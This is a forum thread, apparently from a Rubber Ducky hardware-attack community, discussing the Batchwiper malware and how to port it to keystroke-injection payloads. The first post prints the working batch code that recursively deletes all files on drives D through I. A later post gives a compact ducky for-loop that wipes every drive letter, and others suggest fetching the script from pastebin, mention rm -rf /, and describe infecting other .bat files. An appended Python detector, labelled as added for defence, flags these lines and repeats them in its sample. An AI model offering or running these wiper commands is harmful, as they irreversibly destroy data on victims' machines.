[Suggestion] Batchwiper payload via Ducky?


The Iranian CERT has posted notification on a piece of destructive malware based on simple batch files. AlienVault Labs has a writeup here:

http://labs.alienvault.com/labs/index.php/2012/batchwiper-just-another-wiping-malware/

They posit that this could be spread by USB.

I'm thinking it would be incredibly simple to adapt this into ducky script.

Not saying you should go formatting drives, just an interesting observation. I mean it literally is dead simple, look at this code snippet:


sleep for 3000
IF EXIST d:\ del “d:\*.*” /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del “e:\*.*” /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del “f:\*.*” /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del “g:\*.*” /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del “h:\*.*” /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del “i:\*.*” /q /s /f
IF EXIST i:\ Chkdsk i:

What are your thoughts on this?


Looks interesting... Not often you see malware written in batch! I wonder what the reasoning behind it was? The selective dates make it look like a very bespoke bit of work meant to target quite a specific group.

As far as porting to the Ducky, it shouldn't be too hard, perhaps the quickest would be to download the batch script from pastebin and run it?


Hmmm, rather destructive.

From a commercial perspective - it would waste time and money. A decent forensic analysis should be able to recover data, again costing money.

From a home user perspective - it would be really annoying. Specially if I had the family camera connected!

Again, you're relying on user permissions: at home (likely an admin user), at work (likely a low-level grunt).

Probably achievable by executing the commands through multiple run boxes.

From an infection perspective, wouldn't it be better to write a malicious script in Visual Basic or WScript to append that script (if permissions allow) to any *.bat file detected on the system (including attached drives)?

We already know the ducky can call a script/binary from mass storage (therefore not reliant on internet connection for payload delivery).


If I was .gov funded, I would do something more along the lines of http://media.blackhat.com/bh-us-11/Davis/BH_US_11-Davis_USB_Slides.pdf

The Ducky is a possible platform to exploit USB driver vulnerabilities. It's just a hassle to find them; most of the easily exploitable bugs are now patched (in common drivers).


I would hope any nuclear research facility would be running some kind of back up or something.

Now I know there are stupid people everywhere.

I think the best way to mess with someone would not be to blank their hard drive (throws up a giant warning flag) but to just modify a few sections of a couple of files (takes forever to figure this out).

As an example, what if someone changed a few resistors on the file for the Rubber Ducky -- would you check that before getting it manufactured?

This just reminds me of telling people new to Linux:

rm -rf /

Edited by leapole

I would hope that any nuclear research facility wouldn't be running some kind of backup. If these weapons didn't exist the world would be a much safer place :)


Page 27 of the PowerPoint midnitesnake posted contains the line:

The knowledge of how to emulate USB devices is not widespread

Interesting quote...

Yeah, the guy who wrote those slides can't even emulate USB devices. That's where that quote comes from. I'd say the Teensy was quite widespread, since it was used to pwn the PS3. *cough*. Was speaking to him at Blackhat; he's just playing off others' work, which he mentioned on slide 10.

Philip Polstra (Uni of Dubuque) knows a lot more, and has written an interesting presentation & whitepaper:

Preventing “Oh Shit” Moments for €20 or Less - Black Hat

http://www.slideshar.../ppolstra/44con

Edited by midnitesnake

Maybe modify that "for" loop I wrote to modify the SAM payload, to make the payload shorter.

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\ del “%a:\*.*” /q /s /f)

Haven't tested the above yet, for apparent reasons.

Edited by overwraith
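As a defender-side counterpart to the per-drive snippet in the first post and to overwraith's for-loop version, here is an added detection script (written for this page; not code from the thread, AlienVault or the malware) that flags batch lines of either shape, including the curly-quote form the forum paste carries. The sample input is constructed.

```python
"""Flag batch lines that match the Batchwiper shape shown in this thread.

Two shapes are recognised:
  1. per-drive:  IF EXIST d:\\ del "d:\\*.*" /q /s /f   (then Chkdsk d:)
  2. looped:     for %a in (A B C) do (IF EXIST %a:\\ del "%a:\\*.*" /q /s /f)
"""
import re

# A `del` aimed at a drive root (a letter or a %a-style loop variable) with
# the recursive (/s) and quiet (/q) switches in any order.  Quotes may be
# straight or curly, because the forum paste above carries curly quotes.
_QUOTE = r'["\u201c\u201d]?'
_ROOT = r'(?P<root>(?:[a-z]|%~?\w)):\\\*\.\*'
_DEL_RE = re.compile(r'\bdel\s+' + _QUOTE + _ROOT + _QUOTE
                     + r'(?P<switches>(?:\s+/[qsf])+)', re.IGNORECASE)
_CHKDSK_RE = re.compile(r'\bchkdsk\s+(?P<root>[a-z]):', re.IGNORECASE)
_FOR_RE = re.compile(r'\bfor\s+%~?\w\s+in\s*\((?P<letters>[^)]*)\)',
                     re.IGNORECASE)


def scan_batch(text):
    """Return (line_no, kind, drives) tuples for wiper-like lines."""
    findings, wiped = [], set()
    for no, line in enumerate(text.splitlines(), 1):
        chk = _CHKDSK_RE.search(line)
        if chk and chk.group('root').upper() in wiped:
            # chkdsk on a drive the script just emptied: second half of the
            # wipe/chkdsk pairing seen in the snippet above
            findings.append((no, 'chkdsk-after-wipe', [chk.group('root').upper()]))
            continue
        m = _DEL_RE.search(line)
        if not m:
            continue
        switches = {s.lower() for s in m.group('switches').split()}
        if not {'/s', '/q'} <= switches:
            continue  # a single-file or interactive delete is not the pattern
        root = m.group('root')
        if root.startswith('%'):
            loop = _FOR_RE.search(line)
            drives = loop.group('letters').upper().split() if loop else ['*']
            findings.append((no, 'loop-wipe', drives))
        else:
            drives = [root.upper()]
            findings.append((no, 'drive-wipe', drives))
        wiped.update(drives)
    return findings


# Constructed sample, not a real capture: two drive wipes (one with curly
# quotes), one harmless temp-file delete, and the looped variant.
SAMPLE = ('sleep for 3000\n'
          'IF EXIST d:\\ del "d:\\*.*" /q /s /f\n'
          'IF EXIST d:\\ Chkdsk d:\n'
          'IF EXIST e:\\ del \u201ce:\\*.*\u201d /q /s /f\n'
          'del "%TEMP%\\build.log" /q\n'
          'for %a in (A B C) do (IF EXIST %a:\\ del "%a:\\*.*" /q /s /f)\n')

if __name__ == '__main__':
    for finding in scan_batch(SAMPLE):
        print(finding)
```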
